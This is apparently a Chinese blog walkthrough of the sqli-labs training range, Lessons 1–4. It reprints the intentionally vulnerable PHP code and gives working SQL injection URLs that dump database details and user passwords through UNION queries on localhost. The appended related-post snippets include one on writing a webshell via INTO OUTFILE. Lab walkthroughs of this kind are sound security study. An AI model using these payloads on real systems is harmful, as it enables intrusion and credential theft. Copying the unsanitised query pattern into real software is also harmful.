YouNgFreshq
YouNgFreshq

sqli-Labs靶场笔记

点击打开链接

http://blog.csdn.net/u012763794/article/details/51207833

http://blog.csdn.net/u012763794/article/details/51361152

http://blog.csdn.net/u012763794/article/details/51457142

Less-1 基于错误的 - get 单引号 - 字符型注入


先打开网页查看 Welcome Dhakkan

②查看源代码 index.php :
[php]  view plain  copy
  1. "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
  2. "http://www.w3.org/1999/xhtml">  
  3.   
  4. "Content-Type" content="text/html; charset=utf-8" />  
  5. Less-1 **Error Based- String**  
  6.   
  7.   
  8. "#000000">  
  9. " margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
      
  10. "3" color="#FFFF00">  
  11.   
  12.   
  14. //including the Mysql connect parameters.  
  15. include("../sql-connections/sql-connect.php");  
  16. error_reporting(0);  
  17. // take the variables   
  18. if(isset($_GET['id']))  
  19. {  
  20. $id=$_GET['id'];  
  21. //logging the connection parameters to a file for analysis.  
  22. $fp=fopen('result.txt','a');  
  23. fwrite($fp,'ID:'.$id."\n");  
  24. fclose($fp);  
  25.   
  26. // connectivity   
  27.   
  28.   
  29. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";  
  30. $result=mysql_query($sql);  
  31. $row = mysql_fetch_array($result);  
  32.   
  33.     if($row)  
  34.     {  
  35.     echo "";  
  36.     echo 'Your Login name:'$row['username'];  
  37.     echo "
    "    ;  
  38.     echo 'Your Password:' .$row['password'];  
  39.     echo "";  
  40.     }  
  41.     else   
  42.     {  
  43.     echo '';  
  44.     print_r(mysql_error());  
  45.     echo "";    
  46.     }  
  47. }  
  48.     else { echo "Please input the ID as parameter with numeric value";}  
  49.   
  50. ?>  
  51.  



  
  • "../images/Less-1.jpg" />
    •   
  •   
  •   


    •
    可以看到页面中显示:
    [plain]  view plain  copy
    1. Please input the ID as parameter with numeric value  

    按它说的做,那我们就在URL后面输入:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=1  


    看来我们得到了 登录名:Dumb,以及密码:Dumb,那么为什么会显示出来呢?我们来看下index.php中的代码:
    [php]  view plain  copy
    1. if(isset($_GET['id']))                  //判断id的值时候有被设置  
    2. {  
    3. $id=$_GET['id'];                    //取出id值  
    4. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";    //构建sql语句,漏洞所在  
    5. .....  
    6. .....  
    7. $result=mysql_query($sql);              //然后查询,并返回结果  
    8. $row = mysql_fetch_array($result);  
    9. if($row)  
    10. {  
    11.     echo "";  
    12.     echo 'Your Login name:'$row['username'];  
    13.     echo "
      "      ;  
    14.     echo 'Your Password:' .$row['password'];  
    15.     echo "";  
    16.     }  
    17.     else   
    18.     {  
    19.     echo '';  
    20.     print_r(mysql_error());  
    21.     echo "";    
    22.     }  
    23. }  
    24.     else { echo "Please input the ID as parameter with numeric value";}  
    25.   
    26. ?>  


    这样一来就明白了为什么会有这样的结果,当然如果你输入不同的id值就会返回不同的结果,实际查询的语句是:
    [plain]  view plain  copy
    1. SELECT * FROM users WHERE id='1' LIMIT 0,1;  

    注意:这里的$id是被单引号包起来的,我可以可以通过 ' 来验证,输入URL:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=1'  



    以下还有两个注入可以成功执行:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=1' or'1'='1  
    2. http://localhost/sqli-labs-master/Less-1/?id=1' or 1=1 --+  

    对应的mysql执行语句:
    [plain]  view plain  copy
    1. SELECT * FROM users WHERE id='1' or '1'='1' LIMIT 0,1  
    2. SELECT * FROM users WHERE id='' or 1=1 --+' LIMIT 0,1  

    接下来我们利用 order by 来判断users表中有几列,输入如下:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=1' order by 1 %23  



    注意:%23 是指 # 的编码
    提示的信息可以使我们确定没有第4列,接下来使用联合语句 union 来查询,输入:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 %23  
    注意:细心的朋友可能发现我把1改成-1,原因是当用id=1的时候执行的结果只有一条记录,这是因为在 index.php 中并没有循环取出数据。

    解决方法是:让第一行查询的结果是空集(即union左边的select子句查询结果为空),那么我们union右边的查询结果自然就成为了第一行,就打印在网页上了,这个id他一般传的是数字,而且一般都是从1开始自增的,我们可以把id值设为非正数(负数或0),浮点数,字符型或字符串都行。

    可以看到只有第2列和第3列的结果显示在页面上,我们只有 2,3可以用,接下来我们就利用 2,3来查询数据库的信息,需要用到的函数有:

    concat_ws():从数据库里取N个字段,然后组合到一起用符号分割显示,第一个参数剩余参数间的分隔符
    char():将十进制ASCII码转化成字符
    user():返回当前数据库连接使用的用户
    database():返回当前数据库连接使用的数据库
    version():返回当前数据库的版本


    构建如下Sql语句:

    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,(concat_ws(char(32,58,32),user(),database(),version())) %23  

    注意:这里的32表示 [空格],58表示 [:] ,执行



    知道数据库名了,接下来就是拆解表了。

    首先说一下mysql的数据库information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息,下面说一下常用的几个表


    SCHEMATA表:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等,show databases的结果取之此表。

    TABLES表:储存mysql中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表

    COLUMNS表:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,猎德注释等。是show columns from schemaname.tablename的结果取之此表。


    注意,查询information_schema中的信息时,使用where语句,那个值不能直接用英文,要用单引号包裹着,当然用其十六进制表示也可以,数值类型的就不用单引号了,这对过滤单引号应该有指导意义。

    security的十六进制转换是:0x7365637572697479

    16进制转换地址:http://www.bejson.com/convert/ox2str/


    那么,接下来。构建 Sql 语句:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 %23  


    只返回一个table,原因很简单,还是循环问题。那么我们可以使用limit来依次列举:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1 %23  

    \

    不断的改变,limit的第一个参数,就可以一次列举出来,不过太麻烦了,我们直接使用 group_concat函数,该函数返回一个字符串结果,该结果由分组中的值连接组合而成,那么构建 sql 语句:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+  



    Less-2 基于错误的 - get - 数字型

    先打开网页查看 Welcome Dhakkan


    ②查看源代码 index.php :
    [php]  view plain  copy
    1. "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
    2. "http://www.w3.org/1999/xhtml">  
    3.   
    4. "Content-Type" content="text/html; charset=utf-8" />  
    5. Less-2 **Error Based- Intiger**  
    6.   
    7.   
    8. "#000000">  
    9.   
    10.   
    11.   
    12.   
    13. " margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
        
    14. "3" color="#FFFF00">  
    15.   
    16.   
    18. //including the Mysql connect parameters.  
    19. include("../sql-connections/sql-connect.php");  
    20. error_reporting(0);  
    21. // take the variables  
    22. if(isset($_GET['id']))  
    23. {  
    24. $id=$_GET['id'];  
    25. //logging the connection parameters to a file for analysis.  
    26. $fp=fopen('result.txt','a');  
    27. fwrite($fp,'ID:'.$id."\n");  
    28. fclose($fp);  
    29.   
    30.   
    31. // connectivity   
    32. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  
    33. $result=mysql_query($sql);  
    34. $row = mysql_fetch_array($result);  
    35.   
    36.     if($row)  
    37.     {  
    38.     echo "";  
    39.     echo 'Your Login name:'$row['username'];  
    40.     echo "
      "      ;  
    41.     echo 'Your Password:' .$row['password'];  
    42.     echo "";  
    43.     }  
    44.     else   
    45.     {  
    46.     echo '';  
    47.     print_r(mysql_error());  
    48.     echo "";    
    49.     }  
    50. }  
    51.     else  
    52.         {     
    53.         echo "Please input the ID as parameter with numeric value";  
    54.         }  
    55.   
    56. ?>  
    57.   
    58.   
    59.  



      
  • "../images/Less-2.jpg" />
    •   
  •   
  •   


    •
    可以看到页面中显示:
    [plain]  view plain  copy
    1. Please input the ID as parameter with numeric value   
    按它说的做,那我们就在URL后面输入:

    这样我们就得到了用户名和密码,在 index.php 中唯一的区别就是 $id 没有用单引号包住了,这是因为sql对于数字型的数据可以不加单引号。当然这也使得注入更加容易了,没什么好说的,构建sql语句:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-1/?id=-1 union select 1,group_concat(char(32),username,char(32),group_concat(char(32),password,char(32)) from users--+  


    Less-3基于错误的 - GET单引号变形字符型注入

    先打开网页查看 Welcome Dhakkan


    ②查看源代码:
    [php]  view plain  copy
    1. "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
    2. "http://www.w3.org/1999/xhtml">  
    3.   
    4. "Content-Type" content="text/html; charset=utf-8" />  
    5. Less-3 Error Based- String (with Twist)   
    6.   
    7.   
    8.   
    9. "#000000">  
    10.   
    11. " margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
        
    12. "3" color="#FFFF00">  
    13.   
    14.   
    16. //including the Mysql connect parameters.  
    17. include("../sql-connections/sql-connect.php");  
    18. error_reporting(0);  
    19. // take the variables  
    20. if(isset($_GET['id']))  
    21. {  
    22. $id=$_GET['id'];  
    23. //logging the connection parameters to a file for analysis.  
    24. $fp=fopen('result.txt','a');  
    25. fwrite($fp,'ID:'.$id."\n");  
    26. fclose($fp);  
    27.   
    28. // connectivity   
    29.   
    30.   
    31. $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  
    32. $result=mysql_query($sql);  
    33. $row = mysql_fetch_array($result);  
    34.   
    35.     if($row)  
    36.     {  
    37.     echo "";  
    38.     echo 'Your Login name:'$row['username'];  
    39.     echo "
      "      ;  
    40.     echo 'Your Password:' .$row['password'];  
    41.     echo "";  
    42.     }  
    43.     else   
    44.     {  
    45.     echo '';  
    46.     print_r(mysql_error());  
    47.     echo "";    
    48.     }  
    49. }  
    50.     else { echo "Please input the ID as parameter with numeric value";}  
    51.   
    52. ?>  
    53.   
    54.   
    55.  



      
  • "../images/Less-3.jpg" />
    •   
  •   
  •   

    •

    可以看到页面中显示:
    [plain]  view plain  copy
    1. Please input the ID as parameter with numeric value  

    按它说的做,那我们就在URL后面输入:


    一样的画面,可以发现在 index.php 中的 $id 改成了 ('$id') 了,当然,也很容易验证:

    首先看到near和at之间的字符串,直接将左右的引号去掉,那么就得到'-1'') LIMIT 0,1,')是多出来的,因此可以确认这是单引号注入的变形。输入如下sql语句:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-3/?id=1')--+  


    正常显示了吧,基本上就没什么区别了,构建的sql语句如下:
    [plain]  view plain  copy
    1. http://localhost/sqli-labs-master/Less-3/?id=-1') union select 1,group_concat(char(32),username,char(32),group_concat(char(32),password,char(32)) from users--+  


    Less-4基于错误的GET双引号字符型注入

    先打开网页查看 Welcome Dhakkan

    ②查看源代码:
    [php]  view plain  copy
    1. "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
    2. "http://www.w3.org/1999/xhtml">  
    3.   
    4. "Content-Type" content="text/html; charset=utf-8" />  
    5. Less-4 Error Based- DoubleQuotes String  
    6.   
    7.   
    8. "#000000">  
    9. " margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   "#FF0000"> Dhakkan 
        
    10. "3" color="#FFFF00">  
    11.   
    12.   
    14. //including the Mysql connect parameters.  
    15. include("../sql-connections/sql-connect.php");  
    16. error_reporting(0);  
    17. // take the variables  
    18. if(isset($_GET['id']))  
    19. {  
    20. $id=$_GET['id'];  
    21. //logging the connection parameters to a file for analysis.  
    22. $fp=fopen('result.txt','a');  
    23. fwrite($fp,'ID:'.$id."\n");  
    24. fclose($fp);  
    25.   
    26. // connectivity   
    27.   
    28. $id = '"' . $id . '"';  
    29. $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";  

    你可能感兴趣的:(sqli-labs)

    • Sqli-labs靶场第11关详解[Sqli-labs-less-11] 「已注销」 sqli-labs数据库web安全网络安全mysqlsql
      Sqli-labs-Less-11前言:SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用orderby来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version(
    • sqli-labs less17 password-update语句 Yix1a
      转自一位不知名大佬的笔记-----------------------------------less-17-----------------------------------原urlhttp://192.168.137.138/sqli-labs-master/Less-17/页面显示:[PASSWORDRESET](密码重置)说明这个页面很有可能是使用了update语句很多网页有修改密码的功
    • Sqli-labs——lesson11 Shock397 Sqli-labs闯关安全
      在11关是登录界面了我们可以先用bp抓包来看它的post请求来再在Hackbar里面的postdata里面对数据进行操作1、在对uname的admin加上'后回显错误,说明此处存在注入漏洞2、首先先在username中验证:用or1=1#即可验证此处确实存在注入漏洞同样在password位也能验证出来3、验证成功后我们开始构造sql语句进行注入1)判断列数:输入orderby3回显错误,2正确,说
    • sqli-labs靶场安装 小红帽Like大灰狼 Kali网络安全sql靶场sql注入小皮搭建sqli-labs靶场
      1、下载小皮官网下载:https://www.xp.cn/2、安装小皮不要安装在有中文的目录下3、打开靶场,解压靶场靶场地址(我网盘分享了)sqli-labs靶场提取码:jctl**4、配置网站**5、浏览器访问网站安装成功
    • 《SQLi-Labs》05. Less 29~37 永别了,赛艾斯滴恩 lessandroid前端
      title:《SQLi-Labs》05.Less29~37date:2024-01-1722:49:10updated:2024-02-1218:09:10categories:WriteUp:Security-Labexcerpt:HTTP参数污染,联合注入、宽字节注入。comments:falsetags:top_image:/images/backimg/SunsetClimbing.png
    • 云服务器利用Docker搭建sqli-labs靶场环境
      在云服务器上利用Docker搭建sqli-labs靶场环境可以通过以下步骤完成:安装Docker:首先,你需要在你的云服务器上安装Docker。具体命令如下:sudoapt-getupdatesudoapt-getinstalldocker-ce拉取sqli-labs镜像:接下来,你需要从DockerHub上拉取sqli-labs的镜像。可以使用以下命令完成:dockerpullaudi1/sql
    • Sqli-Labs 通关笔记 神丶上单 数据库mysqlsql网络安全web
      文章目录07-SQL注入1.搭建sqli靶场2.完成SQLi-LABSPage-1**Less-1GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)**1.获取当前数据库2.获取所有库名3.获取表名4.获取表的所有字段5.获取users表所有字段内容**Less-2GET-Errorbased-Intigerbased(基于错误的GET整型注入
    • sqli-labs环境安装及所遇到的坑 积极向上的三毛
      我们采用的是Sqli-labs+phpstudy的方式。1.下载phpstudy并解压安装,下载地址:https://www.xp.cn/download.html?utm_source=so注意:本机由于一开始下的版本过高,导致不兼容。以下为2016版。从网上查询得知,因为sqli-labs是很多年前的了,php版本过高会导致无法解析。2.Sqli-labs项目地址—Github获取:https
    • CTF--Web安全--SQL注入之Post-Union注入 给我杯冰美式 Web安全--SQL注入web安全sql安全
      一、手动POST注入实现绕过账号密码检测我们利用sqli-labs/Less-11靶场来进行演示:我们可以看到一个登录页面打开Less-11的根目录,我们打开页面的源代码(PHP实现)。用VS-code打开文件,找到验证登录信息的代码行。此形式的代码存在POST注入漏洞。我们可以注入一句万能密码。admin'or1=1#单看这句代码可能不是很直观,我们将这句万能密码写到源代码中进行观察。@$sql
    • CTF-Web安全--SQL注入之Union注入详解 给我杯冰美式 Web安全--SQL注入web安全sql安全
      一、测试靶场与使用工具浏览器:火狐浏览器--Firefox靶场:sqli-labs使用插件:HackBar操作环境:phpstudy二、判断字符型注入与数字型注入操作步骤:1、用F12打开控制台,打开HackBar,LoarURL,将当前靶场的URL信息复制到操作台上2、输入?id=1,观察到页面发生变化,显示的是id=1时数据库中的信息,?是用来分割URL和查询字符串的,查询到了id=1时的用户
    • Sqli-labs靶场1-5 777sea 网络安全技术学习sqlweb安全
      流程判断注入点和注入类型判断字段个数判断显示位爆库爆表爆字段名爆内容配置注意事项使用sqli-labs本地靶场,配置本地靶场需要注意的问题:数据库配置文件db-creds.incphp版本由于该靶场比较古早,所以php的版本要选择更低一点的,比如5.3.29Less-1单引号注入1.判断注入点和注入类型单引号报错?id=-1'--+2.查字段个数?id=1'orderby4--+3.判断显示位?i
    • CenOS6.5搭建sqli-labs-master靶场环境 Toert_T sql注入安全信息安全sql网络安全mysqlphp
      目录一、靶场搭建环境准备二、搭建过程0x1配置本地软件仓库0x2安装sqli-labs支持服务0x3部署sqli-labs靶场三、测试sqli-labs靶场环境一、靶场搭建环境准备sqli-labs-master是一套结合http+php+mysql环境的sql注入练习平台,里面有丰富的sql注入靶场环境虚拟机软件:VMware®Workstation16Pro虚拟机系统:Centos6.5虚拟网
    • sqli-labs-master靶场搭建详细过程(附下载链接) Sarahie 靶场网络安全
      1、下载地址:小皮:Windows版phpstudy下载-小皮面板(phpstudy)(xp.cn)Sqli:mirrors/audi-1/sqli-labs·GitCode2、安装小皮3、把sqli压缩包放进去解压,找到$dbpass=''单引号里面填root具体路径如下4、打开小皮,启动apache、mysql,访问:http://127.0.0.1/sqli-labs-master/搭建完成
    • SQL注入:sqli-labs靶场通关(1-37关) 未知百分百 安全数据库sql数据库通关网络安全安全web安全安全威胁分析
      SQL注入系列文章:初识SQL注入-CSDN博客SQL注入:联合查询的三个绕过技巧-CSDN博客SQL注入:报错注入-CSDN博客SQL注入:盲注-CSDN博客SQL注入:二次注入-CSDN博客SQL注入:orderby注入-CSDN博客SQL注入:宽字节注入-CSDN博客目录第1关(联合查询)第2关(数字型)第3关('闭合)第4关(")闭合)第5关(报错注入)第6关("闭合)第7关(secure
    • MAC下搭建PHP开发环境及sqli-labs安装 2mpossible
      为了学习web,首先要搭建php开发环境,由于我用的是mac,所以首选用MAMP来搭建首先确保互联网共享状态是关闭的,在系统偏好设置的共享里面设置然后安装MAMP安装好了会有MAMP和MAMPPRO,打开MAMP,StartServers在localhost:8888就会有我们的服务点击Preferences,在Ports修改Apache和Mysql端口为80和3306然后我为了方便更改我的默认目
    • sqli-labs第一关的闯关 修书成林 mysqlsqldatabase
      第一关:单引号错误SQL的注入最终是为了拿到数据库的文件或者数据。刚进页面,显示需要输入id。于是我们使用在地址栏后面加上?id=1第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句echo“$sql”判断有无注入点:老规矩:加上and1=1;and1=2,看一下
    • sqli-labs第一关详解 纯新手向 含原理 On3_Thing
      Less-01为方便初学者理解,更改了sqli-labs的源码,以显示sql语句后期学习中需要自己推理初始页面在url后面用get传值id=1,随后能看到网页出现变化如下图不断更改上传id的值,会有不同的用户信息显示。按递增顺序直到14为止,即(1~14)判断注入点是否存在且能否使用一般使用单引号进行判断,加到url后面出现报错内容大致为LIMIT0,1附近有语法错误。为什么要使用单引号进行判断实
    • sqli-labs第一关 瓜子壳、 数据库
      1.判断是否存在注入,注入是字符型还是数字型??id=1and1=1?id=1and1=2因为输入and1=1与and1=2回显正常,所以该地方不是数字型。?id=1'?id=1'--+输入单引号后报错,在单引号后添加--+恢复正常,说明存在字符注入2.猜解SQL查询语句中的字段数?id=1'orderby3--+?id=1'orderby4--+利用二分法尝试,得到列数为33.确定回显位置将id
    • 安全小记-sqli-labs闯关 九字宸 安全
      1.安装靶场介绍:SQLI,sqlinjection,我们称之为sql注入。何为sql,英文:StructuredQueryLanguage,叫做结构化查询语言。常见的结构化数据库有MySQL,MSSQL,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼
    • sqli-labs闯关随记 拓海AE sqli-labs闯关sql数据库网络安全
      前言:做了sqli-labs的接近三十关,在这里简单做个总结,以下是自己在闯关中所学到的知识,包括在网上查询、参考别人文章以及资料所理解到的。这个随记比较杂乱,都是我边学边写的,希望大家凑合着看哈。会不定时更新,如果后面内容较多,会考虑分为上下篇。1、sql注入分类基于从服务器接收到的响应:基于错误的sql注入联合查询的类型堆查询注射sql盲注:基于布尔sql盲注基于时间的sql盲注基于报错的sq
    • sqli-labs闯关 鱼不知忆 安全
      目录1.安装靶场2.了解几个sql常用知识2.1联合查询union用法2.2MySQL中的通配符:2.3常用函数2.4数据分组3.mysql中重要的数据库和表4.开始闯关4.1Less-14.1.1首先进行一次常规的注入4.1.2深入解析1.安装靶场1.首先推荐使用github下载靶场源码https://github.com/Audi-1/sqli-labs2.接着你需要phpstudy即小皮面板
    • sqli-labs-master 下载、搭建 etc _ life 数据库
      sqli-labs-mastersqli-labs-master是一个帮助用户学习和测试SQL注入漏洞的开源项目。它提供了一系列的环境,用户可以在这些环境中进行实验,学习如何检测、利用和防御SQL注入攻击。sqli-labs下载地址:github.com/Audi-1/sqli-labs搭建搭建sqli-labs借助PHPstudy来完成,我们将下载好的sqli-labs-master包解压至PH
    • sqli-labs靶场第一关详解 赛sir 网络安全靶场sql靶场mysql
      目录sqlilabs靶场第一关0.sql注入解释0.1什么是sql注入0.2sql注入的原理0.3sql注入方法0.3.1数字型注入0.3.2字符型注入1.注入第一步判断请求方式、类型1.1打开我自己本地的靶场http://sql.com/Less-1/(上一期靶场搭建:http://t.csdnimg.cn/mzLeq)1.2.进行手工测试判断有没有sql注入?1.3?id=11.4and1=1
    • sqli-labs靶场(1-6关) 沧海一粟@星火燎原 sql数据库
      1、第一关测试id=1id=1'加一个引号报错,两个引号正常,应该是字符,还有回显猜测字段长度id=1'orderby3--+id=1'orderby4--+字段长度为三,接下来确定位置:id=1'and1=2unionselect1,2,3--+查出库名,及版本号id=1'and1=2unionselect1,database(),version()--+接下来爆出所有表名id=1'and1=2
    • sqli-labs靶场第七关 沧海一粟@星火燎原 数据库oracle
      7、第七关id=1'--+单引号报错,id=1"--+双引号不报错,可以判断是单引号闭合id=1')--+也报错,尝试两个括号闭合,id=1'))--+不报错接下来用脚本爆库importstringimportrequestsnumbers=[1,2,3,4,5,6,7,8,9,0]letters2=list(string.ascii_lowercase)fuhao=['~',"@","$","^
    • get基于报错的sql注入利用-读敏感文件和写入一句话木马 狗蛋的博客之旅 Web安全渗透sql数据库
      环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客基础:GET基于报错的sql注入利用-脱库-CSDN博客1、selectintooutfile或dumpfile写入一句话马这里用Sqli-labs靶场的第一关做演示,之前演示过改关卡的闭合符是单引号,靶场地址:http://127.0.0.1/sqlilabs/less-1/?id=1判断MysQL的存
    • WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs靶场搭建(超详细) aozhan001 web安全xss安全网络安全
      目录phpstudy下载安装一,pikachu靶场搭建1.下载pikachu2.新建一个名为pikachu的数据库3.pikachu数据库配置编辑4.创建网站编辑5.打开网站6.初始化安装二,DVWA靶场搭建1.下载DVWA2.创建一个名为dvwa的数据库3.DVWA数据库配置4.创建网站5.打开登入:http://localhost/dvwa/三,sqli-labs靶场搭建1.下载sqli-la
    • sqli-labs 的安装 f1a94e9a1ea7
      sqli-labs下载:https://github.com/Audi-1/sqli-labs解压后放入phpstudy的www目录下打开sqli-labs文件下sql-connections/db-creds.inc文件修改密码:$dbpass='root'phpstudy创建网站,域名为解压的文件名,php版本要在7以下创建好后打开网站,点击Setup/resetDatabaseforlabs
    • Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南 Dr.Neos Web安全漏洞专项靶场mysqlphp渗透测试docker数据库web安全网络安全
      SQL注入—sqli-labs靶场零、前言一、环境搭建①、VirtualBox②、KaliLinux③、Docker二、闯关开始1、Less-1—'—union2、Less-2—数字型—union3、Less-3—')—union4、Less-4—")—union5、Less-5—'—布尔盲注6、Less-6—"—布尔盲注7、Less-7—'))7.1—布尔盲注7.2—文件写入8、Less-8—'
    • CTF 三大测试靶场搭建:DVWA、SQLi-LABS、upload-labs 靶场部署教程(VM + CentOS 7 + Docker) 零号·镜瞳 渗透测试靶场搭建网络安全web安全linuxcentos系统安全
      目录前言靶场介绍DVWASQLi-LABSupload-labs靶场搭建CentOS7虚拟环境准备靶场环境部署系统环境配置Docker环境配置下载Docker配置Docker镜像源启动docker靶场配置靶场镜像抓取创建并运行docker容器靶场的访问&靶场的初始化DVWA靶场重置SQLi-LABS靶场重置upload-labs靶场重置总结补充:docker靶场高级使用进入docker靶场dock
    • SAX解析xml文件 小猪猪08 xml
      1.创建SAXParserFactory实例 2.通过SAXParserFactory对象获取SAXParser实例 3.创建一个类SAXParserHander继续DefaultHandler,并且实例化这个类 4.SAXParser实例的parse来获取文件     public static void main(String[] args) { //
    • 为什么mysql里的ibdata1文件不断的增长? brotherlamp linuxlinux运维linux资料linux视频linux运维自学
      我们在 Percona 支持栏目经常收到关于 MySQL 的 ibdata1 文件的这个问题。 当监控服务器发送一个关于 MySQL 服务器存储的报警时,恐慌就开始了 —— 就是说磁盘快要满了。 一番调查后你意识到大多数地盘空间被 InnoDB 的共享表空间 ibdata1 使用。而你已经启用了 innodbfileper_table,所以问题是: ibdata1存了什么? 当你启用了 i
    • Quartz-quartz.properties配置 eksliang quartz
      其实Quartz JAR文件的org.quartz包下就包含了一个quartz.properties属性配置文件并提供了默认设置。如果需要调整默认配置,可以在类路径下建立一个新的quartz.properties,它将自动被Quartz加载并覆盖默认的设置。   下面是这些默认值的解释 #-----集群的配置 org.quartz.scheduler.instanceName =
    • informatica session的使用 18289753290 workflowsessionlogInformatica
      如果希望workflow存储最近20次的log,在session里的Config  Object设置,log  options做配置,save  session log :sessions  run  ;savesessio log for  these runs:20 session下面的source 里面有个tracing 
    • Scrapy抓取网页时出现CRC check failed 0x471e6e9a != 0x7c07b839L的错误 酷的飞上天空 scrapy
      Scrapy版本0.14.4 出现问题现象: ERROR: Error downloading <GET http://xxxxx  CRC check failed   解决方法   1.设置网络请求时的header中的属性'Accept-Encoding': '*;q=0'   明确表示不支持任何形式的压缩格式,避免程序的解压
    • java Swing小集锦 永夜-极光 java swing
      1.关闭窗体弹出确认对话框   1.1   this.setDefaultCloseOperation (JFrame.DO_NOTHING_ON_CLOSE);   1.2   this.addWindowListener ( new WindowAdapter () { public void windo
    • 强制删除.svn文件夹 随便小屋 java
                在windows上,从别处复制的项目中可能带有.svn文件夹,手动删除太麻烦,并且每个文件夹下都有。所以写了个程序进行删除。因为.svn文件夹在windows上是只读的,所以用File中的delete()和deleteOnExist()方法都不能将其删除,所以只能采用windows命令方式进行删除
    • GET和POST有什么区别?及为什么网上的多数答案都是错的。 aijuans get post
          如果有人问你,GET和POST,有什么区别?你会如何回答? 我的经历      前几天有人问我这个问题。我说GET是用于获取数据的,POST,一般用于将数据发给服务器之用。     这个答案好像并不是他想要的。于是他继续追问有没有别的区别?我说这就是个名字而已,如果服务器支持,他完全可以把G
    • 谈谈新浪微博背后的那些算法 aoyouzi 谈谈新浪微博背后的那些算法
      本文对微博中常见的问题的对应算法进行了简单的介绍,在实际应用中的算法比介绍的要复杂的多。当然,本文覆盖的主题并不全,比如好友推荐、热点跟踪等就没有涉及到。但古人云“窥一斑而见全豹”,希望本文的介绍能帮助大家更好的理解微博这样的社交网络应用。 微博是一个很多人都在用的社交应用。天天刷微博的人每天都会进行着这样几个操作:原创、转发、回复、阅读、关注、@等。其中,前四个是针对短博文,最后的关注和@则针
    • Connection reset 连接被重置的解决方法 百合不是茶 java字符流连接被重置
      流是java的核心部分,,昨天在做android服务器连接服务器的时候出了问题,就将代码放到java中执行,结果还是一样连接被重置   被重置的代码如下;   客户端代码; package 通信软件服务器; import java.io.BufferedWriter; import java.io.OutputStream; import java.io.O
    • web.xml配置详解之filter bijian1013 javaweb.xmlfilter
      一.定义 <filter> <filter-name>encodingfilter</filter-name> <filter-class>com.my.app.EncodingFilter</filter-class> <init-param> <param-name>encoding<
    • Heritrix Bill_chen 多线程xml算法制造配置管理
      作为纯Java语言开发的、功能强大的网络爬虫Heritrix,其功能极其强大,且扩展性良好,深受热爱搜索技术的盆友们的喜爱,但它配置较为复杂,且源码不好理解,最近又使劲看了下,结合自己的学习和理解,跟大家分享Heritrix的点点滴滴。 Heritrix的下载(http://sourceforge.net/projects/archive-crawler/)安装、配置,就不罗嗦了,可以自己找找资
    • 【Zookeeper】FAQ bit1129 zookeeper
      1.脱离IDE,运行简单的Java客户端程序 #ZkClient是简单的Zookeeper~$ java -cp "./:zookeeper-3.4.6.jar:./lib/*" ZKClient    1. Zookeeper是的Watcher回调是同步操作,需要添加异步处理的代码 2. 如果Zookeeper集群跨越多个机房,那么Leader/
    • The user specified as a definer ('aaa'@'localhost') does not exist 白糖_ localhost
